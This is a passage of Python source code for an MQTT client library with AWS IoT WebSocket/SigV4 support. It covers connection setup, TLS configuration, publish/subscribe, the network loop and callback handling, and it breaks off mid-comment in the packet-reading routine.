* Or use loop_start() to set a thread running to call loop() for you.
* Or use loop_forever() to handle calling loop() for you in a blocking
* function.
* Use subscribe() to subscribe to a topic and receive messages
* Use publish() to send messages
* Use disconnect() to disconnect from the broker
Data returned from the broker is made available with the use of callback
functions as described below.
Callbacks
=========
A number of callback functions are available to receive data back from the
broker. To use a callback, define a function and then assign it to the
client:
def on_connect(client, userdata, flags, rc):
print("Connection returned " + str(rc))
client.on_connect = on_connect
All of the callbacks as described below have a "client" and an "userdata"
argument. "client" is the Client instance that is calling the callback.
"userdata" is user data of any type and can be set when creating a new client
instance or with user_data_set(userdata).
The callbacks:
on_connect(client, userdata, flags, rc): called when the broker responds to our connection
request.
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc determines success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
on_disconnect(client, userdata, rc): called when the client disconnects from the broker.
The rc parameter indicates the disconnection state. If MQTT_ERR_SUCCESS
(0), the callback was called in response to a disconnect() call. If any
other value the disconnection was unexpected, such as might be caused by
a network error.
on_message(client, userdata, message): called when a message has been received on a
topic that the client subscribes to. The message variable is a
MQTTMessage that describes all of the message parameters.
on_publish(client, userdata, mid): called when a message that was to be sent using the
publish() call has completed transmission to the broker. For messages
with QoS levels 1 and 2, this means that the appropriate handshakes have
completed. For QoS 0, this simply means that the message has left the
client. The mid variable matches the mid variable returned from the
corresponding publish() call, to allow outgoing messages to be tracked.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent.
on_subscribe(client, userdata, mid, granted_qos): called when the broker responds to a
subscribe request. The mid variable matches the mid variable returned
from the corresponding subscribe() call. The granted_qos variable is a
list of integers that give the QoS level the broker has granted for each
of the different subscription requests.
on_unsubscribe(client, userdata, mid): called when the broker responds to an unsubscribe
request. The mid variable matches the mid variable returned from the
corresponding unsubscribe() call.
on_log(client, userdata, level, buf): called when the client has log information. Define
to allow debugging. The level variable gives the severity of the message
and will be one of MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG. The message itself is in buf.
"""
def __init__(self, client_id="", clean_session=True, userdata=None, protocol=MQTTv31, useSecuredWebsocket=False):
"""client_id is the unique client id string used when connecting to the
broker. If client_id is zero length or None, then one will be randomly
generated. In this case, clean_session must be True. If this is not the
case a ValueError will be raised.
clean_session is a boolean that determines the client type. If True,
the broker will remove all information about this client when it
disconnects. If False, the client is a persistent client and
subscription information and queued messages will be retained when the
client disconnects.
Note that a client will never discard its own outgoing messages on
disconnect. Calling connect() or reconnect() will cause the messages to
be resent. Use reinitialise() to reset a client to its original state.
userdata is user defined data of any type that is passed as the "userdata"
parameter to callbacks. It may be updated at a later point with the
user_data_set() function.
The protocol argument allows explicit setting of the MQTT version to
use for this client. Can be paho.mqtt.client.MQTTv311 (v3.1.1) or
paho.mqtt.client.MQTTv31 (v3.1), with the default being v3.1. If the
broker reports that the client connected with an invalid protocol
version, the client will automatically attempt to reconnect using v3.1
instead.
useSecuredWebsocket is a boolean that determines whether the client uses
MQTT over Websocket with sigV4 signing (True) or MQTT with plain TCP
socket. If True, the client will try to find AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY in the system environment variables and start the
sigV4 signing and Websocket handshake. Under this configuration, all
outbound MQTT packets will be wrapped around with Websocket framework. All
inbound MQTT packets will be automatically wss-decoded.
"""
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._sockpairR, self._sockpairW = _socketpair_compat()
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
self._clean_session = clean_session
if client_id == "" or client_id is None:
self._client_id = "paho/" + "".join(random.choice("0123456789ADCDEF") for x in range(23-5))
else:
self._client_id = client_id
self._username = ""
self._password = ""
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = []
self._current_out_packet = None
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._max_inflight_messages = 20
self._out_messages = []
self._in_messages = []
self._inflight_messages = 0
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
self.on_disconnect = None
self.on_connect = None
self.on_publish = None
self.on_message = None
self.on_message_filtered = []
self.on_subscribe = None
self.on_unsubscribe = None
self.on_log = None
self._host = ""
self._port = 1883
self._bind_address = ""
self._in_callback = False
self._strict_protocol = False
self._callback_mutex = threading.Lock()
self._state_mutex = threading.Lock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.Lock()
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.Lock()
self._in_message_mutex = threading.Lock()
self._thread = None
self._thread_terminate = False
self._ssl = None
self._tls_certfile = None
self._tls_keyfile = None
self._tls_ca_certs = None
self._tls_cert_reqs = None
self._tls_ciphers = None
self._tls_version = tls_version
self._tls_insecure = False
self._useSecuredWebsocket = useSecuredWebsocket # Do we enable secured websocket
self._backoffCore = backoffCore.progressiveBackoffCore() # Init the backoffCore using default configuration
self._AWSAccessKeyIDCustomConfig = ""
self._AWSSecretAccessKeyCustomConfig = ""
self._AWSSessionTokenCustomConfig = ""
def __del__(self):
pass
def setBackoffTiming(self, srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond):
"""
Make custom settings for backoff timing for reconnect logic
srcBaseReconnectTimeSecond - The base reconnection time in seconds
srcMaximumReconnectTimeSecond - The maximum reconnection time in seconds
srcMinimumConnectTimeSecond - The minimum time in milliseconds that a connection must be maintained in order to be considered stable
* Raise ValueError if input params are malformed
"""
self._backoffCore.configTime(srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond)
def configIAMCredentials(self, srcAWSAccessKeyID, srcAWSSecretAccessKey, srcAWSSessionToken):
"""
Make custom settings for IAM credentials for websocket connection
srcAWSAccessKeyID - AWS IAM access key
srcAWSSecretAccessKey - AWS IAM secret key
srcAWSSessionToken - AWS Session Token
"""
self._AWSAccessKeyIDCustomConfig = srcAWSAccessKeyID
self._AWSSecretAccessKeyCustomConfig = srcAWSSecretAccessKey
self._AWSSessionTokenCustomConfig = srcAWSSessionToken
def reinitialise(self, client_id="", clean_session=True, userdata=None):
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
if self._sockpairR:
self._sockpairR.close()
self._sockpairR = None
if self._sockpairW:
self._sockpairW.close()
self._sockpairW = None
self.__init__(client_id, clean_session, userdata)
def tls_set(self, ca_certs, certfile=None, keyfile=None, cert_reqs=cert_reqs, tls_version=tls_version, ciphers=None):
"""Configure network encryption and authentication options. Enables SSL/TLS support.
ca_certs : a string path to the Certificate Authority certificate files
that are to be treated as trusted by this client. If this is the only
option given then the client will operate in a similar manner to a web
browser. That is to say it will require the broker to have a
certificate signed by the Certificate Authorities in ca_certs and will
communicate using TLS v1, but will not attempt any form of
authentication. This provides basic network encryption but may not be
sufficient depending on how the broker is configured.
certfile and keyfile are strings pointing to the PEM encoded client
certificate and private keys respectively. If these arguments are not
None then they will be used as client information for TLS based
authentication. Support for this feature is broker dependent. Note
that if either of these files in encrypted and needs a password to
decrypt it, Python will ask for the password at the command line. It is
not currently possible to define a callback to provide the password.
cert_reqs allows the certificate requirements that the client imposes
on the broker to be changed. By default this is ssl.CERT_REQUIRED,
which means that the broker must provide a certificate. See the ssl
pydoc for more information on this parameter.
tls_version allows the version of the SSL/TLS protocol used to be
specified. By default TLS v1 is used. Previous versions (all versions
beginning with SSL) are possible but not recommended due to possible
security problems.
ciphers is a string specifying which encryption ciphers are allowable
for this connection, or None to use the defaults. See the ssl pydoc for
more information.
Must be called before connect() or connect_async()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
if sys.version < '2.7':
raise ValueError('Python 2.7 is the minimum supported version for TLS.')
if ca_certs is None:
raise ValueError('ca_certs must not be None.')
try:
f = open(ca_certs, "r")
except IOError as err:
raise IOError(ca_certs+": "+err.strerror)
else:
f.close()
if certfile is not None:
try:
f = open(certfile, "r")
except IOError as err:
raise IOError(certfile+": "+err.strerror)
else:
f.close()
if keyfile is not None:
try:
f = open(keyfile, "r")
except IOError as err:
raise IOError(keyfile+": "+err.strerror)
else:
f.close()
self._tls_ca_certs = ca_certs
self._tls_certfile = certfile
self._tls_keyfile = keyfile
self._tls_cert_reqs = cert_reqs
self._tls_version = tls_version
self._tls_ciphers = ciphers
def tls_insecure_set(self, value):
"""Configure verification of the server hostname in the server certificate.
If value is set to true, it is impossible to guarantee that the host
you are connecting to is not impersonating your server. This can be
useful in initial server testing, but makes it possible for a malicious
third party to impersonate your server through DNS spoofing, for
example.
Do not use this function in a real system. Setting value to true means
there is no point using encryption.
Must be called before connect()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
self._tls_insecure = value
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_srv(self, domain=None, keepalive=60, bind_address=""):
"""Connect to a remote broker.
domain is the DNS domain to search for SRV records; if None,
try to determine local domain name.
keepalive and bind_address are as for connect()
"""
if HAVE_DNS is False:
raise ValueError('No DNS resolver library found.')
if domain is None:
domain = socket.getfqdn()
domain = domain[domain.find('.') + 1:]
try:
rr = '_mqtt._tcp.%s' % domain
if self._ssl is not None:
# IANA specifies secure-mqtt (not mqtts) for port 8883
rr = '_secure-mqtt._tcp.%s' % domain
answers = []
for answer in dns.resolver.query(rr, dns.rdatatype.SRV):
addr = answer.target.to_text()[:-1]
answers.append((addr, answer.port, answer.priority, answer.weight))
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
raise ValueError("No answer/NXDOMAIN for SRV in %s" % (domain))
# FIXME: doesn't account for weight
for answer in answers:
host, port, prio, weight = answer
try:
return self.connect(host, port, keepalive, bind_address)
except:
pass
raise ValueError("No SRV hosts responded")
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide very quick
start.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
if bind_address != "" and bind_address is not None:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
raise ValueError('bind_address requires Python 2.7 or 3.2.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state_mutex.acquire()
self._state = mqtt_cs_connect_async
self._state_mutex.release()
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet_mutex.acquire()
self._out_packet = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.acquire()
self._current_out_packet = None
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._ping_t = 0
self._state_mutex.acquire()
self._state = mqtt_cs_new
self._state_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
try:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
sock = socket.create_connection((self._host, self._port))
else:
sock = socket.create_connection((self._host, self._port), source_address=(self._bind_address, 0))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
if self._tls_ca_certs is not None:
if self._useSecuredWebsocket:
# Never assign to ._ssl before wss handshake is finished
# Non-None value for ._ssl will allow ops before wss-MQTT connection is established
rawSSL = ssl.wrap_socket(sock, ca_certs=self._tls_ca_certs, cert_reqs=ssl.CERT_REQUIRED) # Add server certificate verification
rawSSL.setblocking(0) # Non-blocking socket
self._ssl = wssCore.securedWebsocketCore(rawSSL, self._host, self._port, self._AWSAccessKeyIDCustomConfig, self._AWSSecretAccessKeyCustomConfig, self._AWSSessionTokenCustomConfig) # Overeride the _ssl socket
# self._ssl.enableDebug()
else:
self._ssl = ssl.wrap_socket(
sock,
certfile=self._tls_certfile,
keyfile=self._tls_keyfile,
ca_certs=self._tls_ca_certs,
cert_reqs=self._tls_cert_reqs,
ssl_version=self._tls_version,
ciphers=self._tls_ciphers)
if self._tls_insecure is False:
if sys.version_info[0] < 3 or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
self._tls_match_hostname()
else:
ssl.match_hostname(self._ssl.getpeercert(), self._host)
self._sock = sock
self._sock.setblocking(0)
return self._send_connect(self._keepalive, self._clean_session)
def loop(self, timeout=1.0, max_packets=1):
"""Process network events.
This function must be called regularly to ensure communication with the
broker is carried out. It calls select() on the network socket to wait
for network events. If incoming data is present it will then be
processed. Outgoing commands, from e.g. publish(), are normally sent
immediately that their function is called, but this is not always
possible. loop() will also attempt to send any remaining outgoing
messages, which also includes commands that are part of the flow for
messages with QoS>0.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
Returns MQTT_ERR_SUCCESS on success.
Returns >0 on error.
A ValueError will be raised if timeout < 0"""
if timeout < 0.0:
raise ValueError('Invalid timeout.')
self._current_out_packet_mutex.acquire()
self._out_packet_mutex.acquire()
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
if self._current_out_packet:
wlist = [self.socket()]
else:
wlist = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.release()
# sockpairR is used to break out of select() before the timeout, on a
# call to publish() etc.
rlist = [self.socket(), self._sockpairR]
try:
socklist = select.select(rlist, wlist, [], timeout)
except TypeError as e:
# Socket isn't correct type, in likelihood connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for
# some reason.
return MQTT_ERR_CONN_LOST
except:
return MQTT_ERR_UNKNOWN
if self.socket() in socklist[0]:
rc = self.loop_read(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
if self._sockpairR in socklist[0]:
# Stimulate output write even though we didn't ask for it, because
# at that point the publish or other command wasn't present.
socklist[1].insert(0, self.socket())
# Clear sockpairR - only ever a single byte written.
try:
self._sockpairR.recv(1)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self.socket() in socklist[1]:
rc = self.loop_write(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
return self.loop_misc()
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS to
indicate success or MQTT_ERR_NO_CONN if the client is not currently
connected. mid is the message ID for the publish request. The mid
value can be used to track the publish request by checking against the
mid argument in the on_publish() callback if it is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str) or isinstance(payload, bytearray):
local_payload = payload
elif sys.version_info[0] < 3 and isinstance(payload, unicode):
local_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
local_payload = str(payload)
elif payload is None:
local_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
if local_payload is not None and len(local_payload) > 268435455:
raise ValueError('Payload too large.')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
local_mid = self._mid_generate()
if qos == 0:
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False)
return (rc, local_mid)
else:
message = MQTTMessage()
message.timestamp = time.time()
message.mid = local_mid
message.topic = topic
if local_payload is None or len(local_payload) == 0:
message.payload = None
else:
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
self._out_message_mutex.acquire()
self._out_messages.append(message)
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages = self._inflight_messages+1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
self._out_message_mutex.release()
rc = self._send_publish(message.mid, message.topic, message.payload, message.qos, message.retain, message.dup)
# remove from inflight messages so it will be send after a connection is made
if rc is MQTT_ERR_NO_CONN:
with self._out_message_mutex:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
return (rc, local_mid)
else:
message.state = mqtt_ms_queued;
self._out_message_mutex.release()
return (MQTT_ERR_SUCCESS, local_mid)
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. Need have no relationship to the client id.
password: The password to authenticate with. Optional, set to None if not required.
"""
self._username = username.encode('utf-8')
self._password = password
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state_mutex.acquire()
self._state = mqtt_cs_disconnecting
self._state_mutex.release()
self._backoffCore.stopStableConnectionTimer()
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics.
This function may be called in three different ways:
Simple string and integer
-------------------------
e.g. subscribe("my/topic", 2)
topic: A string specifying the subscription topic to subscribe to.
qos: The desired quality of service level for the subscription.
Defaults to 0.
String and integer tuple
------------------------
e.g. subscribe(("my/topic", 1))
topic: A tuple of (topic, qos). Both topic and qos must be present in
the tuple.
qos: Not used.
List of string and integer tuples
------------------------
e.g. subscribe([("my/topic", 0), ("another/topic", 2)])
This allows multiple topic subscriptions in a single SUBSCRIPTION
command, which is more efficient than using multiple calls to
subscribe().
topic: A list of tuple of format (topic, qos). Both topic and qos must
be present in all of the tuples.
qos: Not used.
The function returns a tuple (result, mid), where result is
MQTT_ERR_SUCCESS to indicate success or (MQTT_ERR_NO_CONN, None) if the
client is not currently connected. mid is the message ID for the
subscribe request. The mid value can be used to track the subscribe
request by checking against the mid argument in the on_subscribe()
callback if it is defined.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length, or if topic is not a string, tuple or list.
"""
topic_qos_list = None
if isinstance(topic, str):
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, tuple):
if topic[1]<0 or topic[1]>2:
raise ValueError('Invalid QoS level.')
if topic[0] is None or len(topic[0]) == 0 or not isinstance(topic[0], str):
raise ValueError('Invalid topic.')
topic_qos_list = [(topic[0].encode('utf-8'), topic[1])]
elif isinstance(topic, list):
topic_qos_list = []
for t in topic:
if t[1]<0 or t[1]>2:
raise ValueError('Invalid QoS level.')
if t[0] is None or len(t[0]) == 0 or not isinstance(t[0], str):
raise ValueError('Invalid topic.')
topic_qos_list.append((t[0].encode('utf-8'), t[1]))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics.
topic: A single string, or list of strings that are the subscription
topics to unsubscribe from.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS
to indicate success or (MQTT_ERR_NO_CONN, None) if the client is not
currently connected.
mid is the message ID for the unsubscribe request. The mid value can be
used to track the unsubscribe request by checking against the mid
argument in the on_unsubscribe() callback if it is defined.
Raises a ValueError if topic is None or has zero string length, or is
not a string or list.
"""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, str):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, str):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Use want_write() to determine if there is data waiting to be written.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def want_write(self):
"""Call to determine if there is network data waiting to be written.
Useful if you are calling select() yourself rather than using loop().
"""
if self._current_out_packet or len(self._out_packet) > 0:
return True
else:
return False
def loop_misc(self):
"""Process miscellaneous network events. Use in place of calling loop() if you
wish to call select() or equivalent on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
now = time.time()
self._check_keepalive()
if self._last_retry_check+1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._callback_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, bytearray):
self._will_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
self._will_payload = str(payload)
elif payload is None:
self._will_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
if self._ssl:
if self._useSecuredWebsocket:
return self._ssl.getSSLSocket()
else:
return self._ssl
else:
return self._sock
def loop_forever(self, timeout=1.0, max_packets=1, retry_first_connection=False):
"""This function call loop() for you in an infinite blocking loop. It
is useful for the case where you only want to run the MQTT client loop
in your program.
loop_forever() will handle reconnecting for you. If you call
disconnect() in a callback it will return.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
retry_first_connection: Should the first connection attempt be retried on failure.
Raises socket.error on first connection failures unless retry_first_connection=True
"""
run = True
while run:
if self._state == mqtt_cs_connect_async:
try:
self.reconnect()
except socket.error:
if not retry_first_connection:
raise
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._backoffCore.backOff()
# time.sleep(1)
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
# We don't need to worry about locking here, because we've
# either called loop_forever() when in single threaded mode, or
# in multi threaded mode when loop_stop() has been called and
# so no other threads can access _current_out_packet,
# _out_packet or _messages.
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
self._backoffCore.backOff()
# time.sleep(1)
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
try:
self.reconnect()
except socket.error as err:
pass
return rc
def loop_start(self):
"""This is part of the threaded client interface. Call this once to
start a new thread to process network traffic. This provides an
alternative to repeatedly calling loop() yourself.
"""
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
self._thread.daemon = True
self._thread.start()
def loop_stop(self, force=False):
"""This is part of the threaded client interface. Call this once to
stop the network thread previously created with loop_start(). This call
will block until the network thread finishes.
The force parameter is currently ignored.
"""
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
self._thread.join()
self._thread = None
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered[i] = (sub, callback)
self._callback_mutex.release()
return
self.on_message_filtered.append((sub, callback))
self._callback_mutex.release()
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered.pop(i)
self._callback_mutex.release()
return
self._callback_mutex.release()
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
self._state_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return rc
def _packet_read(self):
# This gets called if pselect() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
# Then try to read the remaining length. This may fail because it is may
# be more than one byte - will need to save data pending next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
